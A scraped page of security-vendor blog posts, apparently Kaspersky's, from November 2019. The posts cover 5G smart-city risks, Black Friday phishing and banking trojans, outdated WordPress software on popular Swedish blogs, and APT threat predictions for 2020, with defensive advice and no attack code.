  • Where possible, block all subscription offers, unless they come from popular and trusted websites. Even then keep your eyes open not to be taken in by a fake website.
  • If unable to avoid an unwanted subscription, you can still block it in the browser settings.
  • Use protective solutions made to warn about scam notifications and delete the existing ones, if needed.

Kaspersky Lab’s products detect push notification attempts and existing subscriptions with the verdicts not-a-virus:AdWare.Script.Pusher and Trojan.Multi.BroSubsc.gen.

5G security and privacy for smart cities

22 Listopad, 2019 - 11:00

The 5G telecommunications revolution is imminent. It is the next generation of cellular network, making use of the existing 4G LTE in addition to opening up the millimeter wave band. 5G will be able to welcome more network-connected devices and increase speeds considerably for users. It will serve as the foundation for advanced services, including:

  • 8k streaming, real-time mobile gaming into augmented/virtual reality experiences;
  • Complex remote operations such as remote unmanned vehicles, delivery and surveillance drones, surgical robots;
  • Critical infrastructure operations: enhanced management and monitoring systems for traffic, energy and water facilities;
  • Emergency and healthcare interventions: services for saving lives greatly benefit from 5G installations; drones can quickly reach and live broadcast an incident location, could be used for delivering first aid and equipment or even to transport a victim to the closest medical center.
5G risks and challenges

Managing security is a continuous and dynamic process. With the dramatic increase in the number of connected devices comes a natural expansion of the attack surface and threat intensity. As 5G technologies become widely deployed, the weaknesses and inherent security flaws of 5G will be identified and hopefully quickly patched.

The key anticipated risks can be described as follows:

  • Protocol weaknesses and large-scale vulnerability exploitation
  • Severe DDoS attacks
  • BYOD threats
  • Data security and privacy
  • State-funded terrorism, anti-fossil fuel activism, espionage or corporate sabotage
  • Critical infrastructure/public safety
Public privacy, safety and critical infrastructure

Connected services and infrastructure is a double-edged sword that helps provide better visibility, efficiency and performance, but is making non-critical infrastructure critical and therefore exposing more of the population to unaffordable risks. The general public is being ‘lulled’ into welcoming the convenience and continuous visibility provided by 5G, though in the event of a disruption, public order could be at stake.

The conventional boundaries of critical infrastructure such as water supply, energy grid, and military facilities, and financial institutions will expand much further to other unprecedented areas in a 5G-connected world. All these will require new standards of safety.

On the privacy side, matters become more complex. The advent of 5G with its short range will definitely mean more cell communication towers and building antennas being deployed in dense urban centers. With the right toolset, someone could collect and track the precise location of users. Another issue is that 5G service providers will have extensive access to large amounts of data being sent by user devices that could show exactly what is happening inside a user’s home and at the very least describe via metadata their living environment, in-house sensors and parameters.

Taking into account all of the above, it is our view that government and industry leaders need to combine their efforts to promote secure and safe 5G technology projects to enhance the services and quality of life for citizens of smart cities.

To learn more about 5G technologies, risks, challenges and security solutions, please read the full report.

Black Friday Alert 2019: Net Shopping Bag of Threats

22 Listopad, 2019 - 10:04

Every year, Kaspersky releases an annual Black Friday alert to highlight how fraudsters may capitalize on increased levels of online shopping at this time of year when many brands are offering their customers appealing discounts. In the rush to get a big discount or, even more panic-inducing, a limited time offer, many shoppers lose all sense of vigilance. Caution goes out the window and consumers start tapping on links and email vouchers without their usual care and attention.

Spam and Phishing

Unfortunately, online shopping at this time of year needs more security-awareness, not less. It is the peak season for phishers and spammers. Along with many genuine offers, there also lurk phishing scams ready to reel in an unwitting bargain hunter’s bank details. By clicking on a too-good-to-be-true discount link online without checking it’s genuine, you could find yourself at a fake marketplace, that may look indistinguishable from the real website. On these sites, entering your bank details could result in money leaving your account, but no package arriving at your door.

Since Kaspersky has been analyzing financial phishing activity, which began in 2013, there has been a steady rise in threats – peaking at 54% in 2017. However, last year this trend did slow down and decrease. The figure dropped to 44.70%. Financial phishing attacks are still expected to be a big risk around the upcoming Black Friday event, and there will be close analysis to see if the figure rises once more.

Share of financial phishing attacks from all phishing decreased for the first time in four years in 2018

Social Engineering in the Retail Sector How do phishing scams work?

In order to make these scams a success, fraudsters need to lure their potential victims to fake webpages and obtain their bank details. To do this, attackers register website domains, often containing the magic phrase ‘Black Friday’ and keep their registration data hidden.

Their sites are usually well designed and appear to be genuine and of a high quality. Unlike many old typo-filled spam emails, phishing web pages are relatively easy to make look authentic – scammers can simply copy the source code from the real store’s website and make theirs appear to be a near perfect match.

Domain addresses are usually hidden until the event itself, so they are not blocked in advance by antivirus software vendors. The scam website is then activated immediately before the phishing mail goes out, just as shown in these screenshots.

Occasionally, these attacks appear to be sent by large banks or payment systems, allegedly partners of the Black Friday sales campaign, while in fact these are carefully crafted copies of legitimate pages and mailshots made by criminals. Emails or warnings may threaten to block the user’s account or promise some financial benefits by clicking on the email. These phishing emails make it seem like all you have to do is follow the link and log in to your account.

However, if you do log in to these sites with your credentials, all your bank account or payment card data — such as card numbers or usernames and passwords — will be leaked to the scammers.

Once they have this data, scammers could be able to withdraw money from your account, sell your bank card details on the dark web, or spend your money in various ways. This is often carried out by teams in other countries.

These scams come in a variety of forms. In one example, scammers offer goods at crazy discounts, encouraging the victim to share their bank card details, thereby risking losing all of their account funds and of course, not receiving their order. In another scheme, the victim might be tricked into transferring money to the attacker’s account, after which the fraudster breaks off all contact and the funds are lost.

There is also another widespread and very successful phishing scheme which asks users to complete a survey and fill in a large registration form, along with bank card details to take part in the promotion. After completing the form, you’re asked to send a link to the website to 10 friends via a messenger app.

Of course, victims of this scam won’t ever receive any prizes but instead end up bombarded with various links and emails for more useless surveys. Any additional clicks on these survey usually mean that scammers receive even more money. Because the survey is shared through messenger apps, more users, who often trust links that come from their friends, might also fall for the trick. And so the cycle continues.

Where are phishing scams occurring?

According to our statistics, more than half of phishing attacks carried out in the digital retail space are in the payment sector – online stores, payment systems and banks. Frequently, criminals use brands of Amazon, eBay and Alibaba to trick users. Amazon was used as a disguise in more than a million attacks in the first three quarters of 2019 alone, as the graph below shows.

Online retailers most hit by phishing attacks during Q1-Q3 2019

Notably, the share of phishing incidents in the online retail space during the peak sales period significantly increased compared to what happens during the rest of the year. For instance, attacks that were using the eBay brand reached nearly 25,000 during the week of November 4th, 2018, two weeks before Black Friday, after experiencing minimal disruption in the preceding days. The Amazon disguise was also a key target for scammers too – facing more than 20,000 phishing attacks during the week of November 19th, 2018, which was the week of Black Friday last year.

Spikes in phising attacks on online marketplaces from August – December 2018

These 2018 findings allow us to predict that in 2019 the situation may repeat.

Banking trojans

Similarly to phishing scams, Banking Trojans also target e-commerce brands so that they can track down user credentials – like banking login details, passwords, bank card numbers or phone numbers.

But with Trojans, the malware can intercept data fields on targeted websites. This means they can modify online page content and steal credentials entered, while the victim will keep thinking that they enter login and password to legitimate fields on the website. Because of this, cybercriminals can monitor a hacked user’s online behavior, such as which sites they visit while on the infected device.

Once the user browses to one of the targeted e-commerce websites, the Trojan activates its form-grabbing functionality and saves all the data a user inputs on the website. On an e-commerce website, this means a credit or debit card number, expiration date and CVV, as well as your site login credentials.

If the site or user’s bank doesn’t feature two-factor authentication, then the criminals behind the Trojan will have access to all this data and can use it to empty the user’s bank account or use their card details for purchases.

In the first three quarters of 2019, Kaspersky discovered 15 families of financial malware targeted at users of popular brands. In addition to the already known banking families such as Zeus, Betabot, Cridex and Gozi, this year, we have also seen two mobile banking Trojans joining our list: Anubis and Gustuff.

Last year’s report saw a 10% increase in the detection rate of financial malware between 2017 and 2018[1], but over the course of the full year that growth was a far more significant 24%. More than 15 million attacks by banking Trojans have been registered in the first three quarters of 2019. This means we have already seen a nine percent increase on what was found during 2018.

Overall number of attacks by Banking Trojans, 2015 – 2019

Mobile Trojans are also able to steal user credentials. The common scenario for user account theft on mobile devices is an overlay-attack, which overlays windows from the hacker’s program on top of the app, or window the user is browsing. Often the overlayed window or data input form is identical to the real one and the user enters their data believing that they are dealing with the original program.

Targeted e-commerce categories

In 2019, we found those 15 malware families were targeting a total of 91 consumer e-commerce sites and mobile apps across the world.

Of those, consumer goods websites such as fashion and clothing, or toys and jewelry, were the most commonly targeted, with 28 websites falling into this category. Also popular with phishing scams are entertainment websites with 20 examples found and travel bookings with 15 in that category.

Surprisingly, sites which sell big ticket items, such as consumer electronics (two websites found) and telecoms (12 websites), which are popular purchases on Black Friday, are at the bottom of the list.

Proportion of e-commerce categories targeted by malware in Q1-Q3 2019

Consumer apparel (fashion, shoes, gifts, toys, jewelry, department store) 28 Entertainment (cinema, games etc.) 20 Travel (Flights, taxi, hotels, etc.) 15 Online retail platform (eBay, Alibaba group etc.) 14 Telecoms 12 Consumer electronics 2

Proportion of e-commerce categories targeted by malware in 2019, by number of targeted brands

Advice and recommendations

As shown in this overview, Black Friday offers a golden opportunity for fraudsters and scammers to steal consumers’ cash. Sometimes a deal can seem too-good-to-be-true, but retailers still offer great discounts at this time of year, so it’s important to examine every deal closely. Shopping around for a bargain can still be enjoyable, it just needs extra vigilance to make sure you can tell the difference between the must-have offers and fake promotions. With incidents of phishing and banking Trojans on the rise, it’s important to stay safe from cyberthreats during the peak Black Friday shopping season.

To stay safe and keep your hard-earned money secure while shopping online, Kaspersky recommends taking the following security measures:

If you are a consumer:

  • Avoid shopping from websites that appear suspicious or flawed, no matter how great their Black Friday deals are
  • Don’t click on unfamiliar links you receive in emails or social media messages, even from people you know, unless you were expecting the message
  • Double check the email address of the sender. If it not the official brand’s website domain, do not click on the link
  • Hover over the linked text in the email or message and see which URL it will actually open
  • Invest in a robust cybersecurity solution to protect all your devices you use to shop online
  • Think about how much money you wish to spend in an online payment transaction account at any one time
  • Reduce the amount of funds you have in your bank and online accounts. The greater the balance, the more can be lost to fraudsters
  • Restrict the number of attempted transactions on your bank card
  • Turn on and always use two-factor authentication (Verified by Visa, MasterCard Secure Code, etc.)

If you are an online brand or retailer:

  • Use a reputable payment service and keep your online trading and payment platform software up to date. Every new update may contain critical patches to make the system less vulnerable to cybercriminals
  • Use a tailored IT and cybersecurity solution to protect your business and customers
  • Pay attention to the personal information used by customers who buy from you. Use a fraud prevention solution that you can adjust to your company profile and the profile of your customers

All research used in this report is based on user data obtained with consent and processed using the Kaspersky Security Network (KSN). All referenced banking Trojan malware were detected and blocked by Kaspersky security solutions.

The cybercrime ecosystem: attacking blogs

21 Listopad, 2019 - 11:00

Executive summary

The Cybercrime Ecosystem is a series of articles explaining how cybercriminals operate, what drives them, what techniques they use and how we, regular Internet users, are part of that ecosystem. The articles will also cover technical details and up-to-date research on the threat landscape to provide a more realistic understanding of why this is a problem and how we can prevent it.

This article describes current problems with cybercriminals infecting websites with malicious code. It is very common to see cybercriminals exploit vulnerabilities in blogging software such as WordPress and Joomla! for injecting their malicious code. This is very effective, as many blogs are whitelisted, are not detected as suspicious websites by anti-virus software and get a lot of traffic. In my research, I decided to investigate this further and see what the current threat landscape looks like by researching the most visited blogs in Sweden.

In my research, I noticed that the majority of the blogs were running outdated versions of not just the WordPress core, but plugins, too. Their vulnerabilities would allow both authenticated and unauthenticated users to execute system commands, inject malicious code, such as JavaScript, and perform SQL injections to get access to the database. Please note that none of the vulnerabilities have been verified; they are simply based on the publicly available version number identified in the research.


Attacking websites and infecting them with malicious code is probably one of the most common types of attacks by cybercriminals. It will allow criminals to perform multiple attacks against visitors to the website. They can basically control all the visitors and redirect their browsers to any website they want, while the visitor may not be aware it is happening. The link to the infected website can be sent by email, in a personal message on a social media platform or any other common way.

By redirecting the visitors to a website under the criminals’ control, they can, for example, exploit vulnerabilities in the browser or other client software such as Java, Flash, Acrobat Reader, VLC, Microsoft Office and tons of others.

They can also redirect the user to scam/spam sites, for example, by tricking users into downloading a fake software update or scaring them to make them pay a ransom. Lately, we have also seen that criminals can utilize the browser itself for cryptocurrency mining, etc. or use it as a zombie in a larger botnet for denial-of-service attacks.

Cybercriminals can hack into blogs by using many different methods, such as exploiting software vulnerabilities or getting access to admin panels, getting remote access (SSH, telnet) with known or leaked passwords, or in some cases, even buying legitimate ads, poisoning these with malicious code, and displaying on the targeted website. This technique is called Malvertising.

I decided to look at the biggest CMS system (WordPress) and the top 50 biggest and most visited blogs in Sweden to see if they were vulnerable against any common and known vulnerabilities. Not all of the top 50 websites where running WordPress; some of them were running custom software or another CMS system. Another obstacle was that it was not possible to ascertain the exploitability of the identified vulnerabilities. I could only base my research on the version of the software/plugin they were running, whereas not all plugins disclose their version numbers, so this report is based only on the version numbers that I have been able to identify.

Tools and techniques used

Determining the version number of a specific plugin or piece of software is straightforward enough: you simply need to look at the source code of the website and follow the links on the website. WordPress provides a few common methods of determining the version number: one of these is to see if the system has RSS (feeds) enabled. By accessing the feed, you also get the version number: it will have a tag.

In addition to this, you can also start enumerating the plugins directory and see if there are any “readme” or installation notes. Most of the plugins have their version number written down in the readme/changelog/installation files or even print the version on the page.

Once the version number has been identified, there is a plenty of public resources you can use to check if that specific plugin is vulnerable to any known attacks. I used mainly two sources, which were www.exploit-db.com and www.wpvulndb.com.

A screenshot from wpvulndb.com

A screenshot from exploit-db.com

To automate this process, I teamed up with the WPscan team who have a tool/API allowing users to scan WordPress sites and automatically query the wpvuldb.com database via a nice API to check if the identified plugins and versions are prone to any known vulnerabilities. I thank WPscan for their support in this project! It would have taken me much longer to do this manually.


The results were very interesting: I noticed that the most visited blogs in Sweden where running outdated software. Thirty-seven percent of the top 40 blogs in Sweden where running an outdated version of WordPress, with the oldest version being from 2012, vulnerable to a lot of exploits—even full remote code execution allowing the attacker to compromise not just the WordPress installation, but the server it is running on, too. When checking the server hosting this extremely old WordPress installation, I found that 13 other websites were running on the same server. Most of the outdated WordPress installations where from 2018.

RELEASE DATE VERSION VULNERABILITIES 2012-06-27 3.4.1 41 2013-06-21 3.5.2 19 2016-06-21 4.3.5 19 2018-08-02 4.9.8 11 2018-08-02 4.9.8 11 2018-08-02 4.9.8 11 2018-08-02 4.9.8 11 2018-08-02 4.9.8 11 2018-08-02 4.9.8 11 2018-08-02 4.9.8 11 2018-08-02 4.9.8 11 2019-03-13 5.1.1 1 2019-06-18 5.2.2 8 2019-09-05 5.2.3 6 2019-09-05 5.2.3 6

Source: cvedetails.com and wpvulndb.com

Another interesting fact is that 55% of the researched sites where running the latest version of WordPress, and out of those systems, 50% had a plugin with a history of being vulnerable, but due to the fact that the version number could not be determined, we do not know if they are still vulnerable. Only four out of these 22 systems had vulnerabilities which were verified via the version number.

Spreading the malware

As mentioned before, this is a very common way for cybercriminals to spread malware, but how does it work in real life? After the WordPress site is compromised, the most common technique is to redirect the user to a so-called exploit kit. This is a system which will enumerate the browser, and if a list of requirements is met, deliver the malicious payload to the victim. For example, some of the requirements may be to exploit a certain browser only, if the exploit kit only has exploits for Firefox. In that case, nothing will happen if you visit the website in Chrome or Internet Explorer.

More advanced exploit kits also enumerate certain users from certain countries, possibly even excluding certain IP addresses from known security companies, law enforcement agencies and other people. The exploit kit also keeps track of successfully infected victims, so the cybercriminals can easily perform their operations or sell access to the infected computers.

Exploit kits do not just deliver malware—they can deliver any payload, e.g. by simply redirecting a user to another website or displaying ads. You yourself may have been redirected to a survey or some kind of “amazing” offer. This could have been done using the same techniques as mentioned above.

Examples of recent and large attacks:

Database leaks

One of the biggest motivators for cybercriminals is financial gain, and although that does not apply to everyone—some attackers have political motivation, others just do it for the adrenaline—making money is still a strong incentive. The cybercriminal ecosystem is huge, and cybercriminals benefit from everything they compromise. Simple things, such as email databases, access to compromised systems or infected computers, email and password combinations, and a lot more are all sold on the black market.

Almost exactly one year ago, I wrote about how much stolen data was being sold on the black market.

Blogs are a goldmine for collecting user data, as they get a lot of visitors who, in many cases, maintain an account on the website to be able to comment on posts. Another reason is that it is very easy to perform social engineering attacks against the visitor, display a fake login page and trick the user into logging in to access “hidden” content.

However, cybercriminals can also exploit SQL injection vulnerabilities both in the WordPress core and many plugins that have these. The vulnerability will allow an attacker to query the underlying database, retrieve data from it, and in some cases, even modify and read/write files in the file system.

Fortinet has written a very good article on some of the SQL injection vulnerabilities they found a few months ago.

Are we doomed?

I personally think that this is not a problem we can blame on the technology, because if you look at, say, WordPress, the system is very good at informing you as an administrator that there are updates available. As you can see from the screenshot below, the available updates are shown in two places: Plugins and Dashboard, where WordPress core updates will show up as well.

One reason why the plugins or software is not updated might be that the current theme is not designed to work with the latest version of the plugin and might not function properly if the plugins are updated. Another reason might be that the people administrating the WordPress installation are marketing/PR agencies or web designers, who are only responsible for the layout, not security.

I think that anyone running a website should take a little more responsibility, not just for their brand, but for the systems they use, too. Regardless of whether you are an influencer, personal blogger or e-commerce website, it should be your best interest to ensure that you are not making the life of cybercriminals easy. If you are only a customer using these blogging platforms, please ask your provider what their policy is for making sure that the blog is secure.

As a regular Internet user, you need to make sure that you are securing your device and keeping your digital identity safe. A very good tip is to use protection against malicious code, which will identify and prevent these attacks even if the blog or website is infected.

You also need to ensure that you are not reusing your passwords on every site. One example of how you can create strong and unique passwords for every site, without using any additional software, can be found here.

Even if you do all of these, it is also very important that you make sure your device and any software installed on it is up to date with the latest security patches. Running the latest and secure versions makes a great difference.

I am also very glad that you took the time to read this article. It means that we are actually starting to make a difference, and the effort that we, security nerds, do reaches people such as yourself. Thank you and please share this knowledge with people who you believe might benefit from it. We cannot solve everything with technology, and we need to use our common sense and share knowledge among ourselves. We need your help with doing just that!

Kaspersky Security Bulletin 2019. Advanced threat predictions for 2020

20 Listopad, 2019 - 11:00

  • Cybersecurity of connected healthcare 2020: Overview and predictions
  • 5G technology predictions 2020
  • Corporate security prediction 2020
  • Cyberthreats to financial institutions 2020: Overview and predictions
  • -->

    Nothing is more difficult than making predictions. Rather than trying to gaze into a crystal ball, we will be making educated guesses based on what has happened during the last 12 months, to see where we can see trends that might be exploited in the near future.

    This is what we think might happen in the coming months, based on the knowledge of experts in this field and our observation of APT attacks – since APT threat actors have historically been the center of innovation.

    The next level of false flag attacks

    The use of false flags has become an important element in the playbook of several APT groups. In the past, this has generally involved trying to deflect attention away from those responsible for the attack – for instance, the usage of Russian words in Lazarus group malware, or Romanian words by WildNeutron. In one notable case – the Olympic Destroyer attack – the Hades APT group sought to go further than just clouding the waters of attribution by forging elements of the attack to make it seem like the work of a different threat actor. We believe that this will develop further, with threat actors seeking not only to avoid attribution but to actively lay the blame on someone else.

    For instance, this could include the usage of established backdoors by other unrelated APT actors, the theft and re-use of code (the recently published case of Turla reusing code from an unknown Iranian group, outlined by the UK NCSC and NSA comes to mind) or deliberately leaking source code so that other groups adopt it and muddy the waters further.

    On top of all that, we should consider how actors continually use commodity malware, scripts, publicly available security tools or administrator software during their attacks and for lateral movement, making attribution increasingly difficult. Mixing a couple of false flags into this equation, where security researchers are hungry for any small clue, might be enough to divert authorship to someone else.

    From ransomware to targeted ransomware

    In the last two years we’ve seen a decline in numbers of all-purpose widespread ransomware attacks as cybercriminals have become more targeted in their use of this type of malware – focusing on organizations that are likely to make substantial payments in order to recover their data. We are calling this technique ‘targeted ransomware’. Throughout the year, we recorded several cases where attackers used targeted ransomware, and we think that a likely future development will be more aggressive attempts to extort money. A potential twist might be that, instead of making files unrecoverable, threat actors will threaten to publish data that they have stolen from the victim company.

    In addition to targeted ransomware, it is inevitable that the cybercriminals will also attempt to diversify their attacks to include other types of devices besides PCs or servers. For instance, ransomware in consumer products, such as smart TVs, smart watches, smart cars/houses/cities. As more devices become connected to the internet, cybercriminals will also be looking for ways to monetize their access to these devices. Ransomware is, unfortunately, the most effective tool for extracting a financial profit from the victims.

    New online banking and payments attack vectors

    A new potential attack vector for cybercriminals could open up with the new banking regulations that have recently come into full effect across the EU. The PSD2 (Payments Services Directive) lays down regulatory requirements for companies that provide payment services, including the use of personal data by new fintech companies that are not part of the established banking community. Security of online, including mobile, payments is a key aspect of the legislation. Nevertheless, as banks will be required to open their infrastructure and data to third parties who wish to provide services to bank customers, it is likely that attackers will seek to abuse these new mechanisms with new fraudulent schemes.

    More infrastructure attacks and attacks against non-PC targets

    Determined threat actors have, for some time, been extending their toolsets beyond Windows, and even beyond PC systems: VPNFilter and Slingshot, for example, targeted networking hardware. The benefit to an attacker, of course, is that once they have compromised such devices, it gives them flexibility. They could opt for a massive botnet-style compromise and use that network in the future for different goals, or they might approach selected targets for more clandestine attacks. In our threat predictions for 2019, we considered the possibility of ‘malware-less’ attacks, where opening a VPN tunnel to mirror or redirect traffic might provide all the necessary information to an attacker. In June, it was revealed that hackers had infiltrated the networks of at least 10 cellular telcos around the world, and had remained hidden for years. In some cases, it seems they had been able to deploy their own VPN services on telco infrastructure. The convergence of real and cyber worlds brought about by the profusion of IoT devices offers growing opportunities for attackers; and it’s evident that threat actors are aware of the potential. This year it was reported that unknown attackers stole 500MB of data from NASA’s Jet Propulsion Laboratory using a Raspberry Pi. In December last year, the UK’s Gatwick airport was brought to a standstill for fear of a possible collision after at least one drone was sighted above one of the runways. While it’s unclear whether this was the result of a hobbyist drone owner or a determined DDoS attacker, the fact remains that part of the country’s critical infrastructure was brought to a standstill because of the use of a drone. The number of such attacks will undoubtedly grow.

    In recent years, we have seen a number of high-profile attacks on critical infrastructure facilities and these have typically been aligned to wider geo-political objectives. While most infections in industrial facilities continue to be from ‘mainstream’ malware, this fact itself highlights just how vulnerable these facilities can be. While targeted attacks on critical infrastructure facilities are unlikely ever to become a mainstream criminal activity, we do expect to see the number grow in the future. Geo-political conflicts are now played out in a world where the physical and cyber are increasingly converging; and, as we have observed before, such attacks offer governments a form of retaliation that lies between diplomacy and war.

    Increased attacks in regions that lie along the trade routes between Asia and Europe

    Clausewitz’s dictum, “War is merely the continuation of politics by other means”, can be extended to include cyberconflict, with cyberattacks reflecting wider real-world tensions and conflicts. We have seen numerous examples. Consider, for example, accusations of Russian interference in US elections and fears about a possible reboot of this in the run-up to the 2020 elections. We’ve seen it in the ‘naming-and-shaming’ of alleged Chinese hackers in US indictments. The widespread use of mobile implants to surveil ‘persons of interest’ is another example.

    There are several ways this could play out. They include a growth in political espionage as governments seek to secure their interests at home and abroad. This could mean monitoring the activities of ‘undesirable’ individuals or movements within the country, as well as those of potential opponents abroad. It is likely to extend also to technological espionage in situations of potential or real economic crisis and resulting instability. This could result in new attacks in regions that lie along trade routes between Asia and Europe, including Turkey, East and South Europe and East Africa.

    It’s quite possible that we will see changes to legislation and policy, as governments look to define more clearly what is and what isn’t allowed. On the one hand, this could be used as a way to establish plausible deniability and thereby avoid sanctions if the finger of suspicion is pointed at one state by another. On the other hand, it could enable more aggressive use of technology, as several justice departments seem keen to open the door to different kinds of ‘lawful interception’ to collect evidence on computers. One likely response from criminal groups will be greater use of encryption and the Darknet to conceal their operations.

    Increasing sophistication of attack methods

    It is hard to know exactly how advanced the top-class attackers really are and what kind of resources they have in their pockets. Of course, every year we learn a bit more: for instance, a few years ago we observed an apparent endless supply of zero-days for resourceful attackers who were ready to pay for them. This year we observed several examples, but probably the most interesting is the one involving at least 14 exploits for iOS during the last two years, as exposed by Google in August.

    The new isolation methods implemented for Microsoft Word and other software traditionally targeted in spear-phishing campaigns might have a significant impact in malware delivery methods, forcing less sophisticated actors to change the way they spread malware.

    We believe it is likely that additional interception capabilities, similar to the Quantum insert attacks described a few years ago, are already being used; and hopefully we will be able to discover some of them.

    It also seems likely that attackers will exfiltrate data with non-conventional methods, such as using signaling data or Wi-Fi/4G, especially when using physical implants (something we also believe is probably being overlooked). In a similar vein, we believe more attackers will use DoH (DNS over HTTPS) in the future to conceal their activities and make discovery more difficult. Finally, it is possible that during the coming months we will start discovering more UEFI malware and infections as our ability to see such systems is slowly improving.

    Use of supply chains will continue to be one of the most difficult delivery methods to address. It is likely that attackers will continue to expand this method through manipulated software containers, for example, and abuse of packages and libraries.

    A change of focus towards mobile attacks

    During the last 10 years, an important transition has taken place: the main storage for our digital lives has moved from the PC to mobiles. Some threat actors were quick to notice this and begin focusing on developing attack tools for mobiles. While we have constantly been predicting a huge increase in the number of attacks against mobiles, the observations from the field haven’t always reflected this inferred evolution. However, the lack of observations of a phenomenon doesn’t necessarily imply that it’s not happening.

    We have already discussed how an attacker abused at least 14 zero-day vulnerabilities in iOS to target certain minorities in Asia. We also saw recently how Facebook sued the Israeli company NSO for allegedly misusing its servers (to deploy malware to intercept user data). We also saw how Android zero-click, full persistence exploits are now more expensive (according to Zerodium’s price list) than those for the iPhone.

    All of this is telling us how much money attackers are investing in developing these technologies. It is clear to all of them how nearly everyone has a phone in his/her pocket and how valuable the information on those devices is. Every year we see new movements in this direction. We also see how complicated it might be for security researchers to obtain more technical details about attacks on such platforms, given the lack of visibility or accessibility.

    There are no good reasons to think this will stop any time soon. However, due to the increased attention given to this subject by the security community, we believe the number of attacks being identified and analyzed in detail will also increase.

    The abuse of personal information: from deep fakes to DNA leaks

    We have previously discussed how data leaks help attackers to craft more convincing social engineering attacks. Not every adversary has a complete profile of potential victims to abuse, which makes the increasing amount of leaked data very valuable. This is also true for ‘less targeted’ attacks like the ransomware cases we have already discussed.

    In a world where logged data continues to grow, we can see the danger in what could be considered especially sensitive leaks, for instance when it comes to biometric data. Also, widely discussed deepfakes are providing the technology to make such attacks a possibility, especially when combining this with less obvious attack vectors such as video and audio. We should not forget how this can be automated, and how AI can help with the profiling and creation of such scams.

    Yes, all this sounds futuristic, but it is very similar to some of the techniques discussed for driving election advertisements through social media. This technology is already in use and it is just a matter of time before some attackers take advantage of it.

    The future holds so many possibilities that there are likely to be things that are not included in our predictions. The extent and complexity of the environments in which attacks play out offer so many possibilities. In addition, no single threat research team has complete visibility of the operations of APT threat actors. We will continue to try and anticipate the activities of APT groups and understand the methods they employ, while providing insights into their campaigns and the impact they have.

    { "channelId" : 15591, "language": "en-US", "commId" : 376339, "displayMode" : "standalone", "height" : "auto" }


     Kaspersky Security Bulletin 2019. Advanced threat predictions for 2020 (PDF, English)